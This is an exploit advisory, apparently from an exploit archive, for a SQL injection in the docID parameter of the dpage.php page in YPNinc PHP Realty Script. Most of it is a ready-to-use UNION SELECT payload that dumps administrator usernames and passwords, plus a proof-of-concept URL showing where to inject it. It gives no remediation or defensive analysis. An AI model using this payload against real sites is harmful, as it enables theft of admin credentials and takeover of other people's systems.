id: 13056
date: 06/29/2010
title: YPNinc PHP Realty Script (docID) SQL Injection Vulnerability
author: v3n0m
cves: 

============================================================
YPNinc PHP Realty Script (docID) SQL Injection Vulnerability
============================================================


Author      : v3n0m
Site        : http://yogyacarderlink.web.id/
Date        : June, 29-2010
Location    : Jakarta, Indonesia
Time Zone   : GMT +7:00
----------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : PHP Realty Script
Vendor      : http://www.ypninc.com/
Price       : $89.95
----------------------------------------------------------------
 
Exploit:
~~~~~~~
-9999+union+all+select+1,2,group_concat(Username,char(58),Password)v3n0m+from+admin--
 
Poc:
~~~~~~~
 
http://127.0.0.1/[path]/dpage.php?docID=[SQLi]
 
----------------------------------------------------------------



#  0day.today [2023-03-25]  #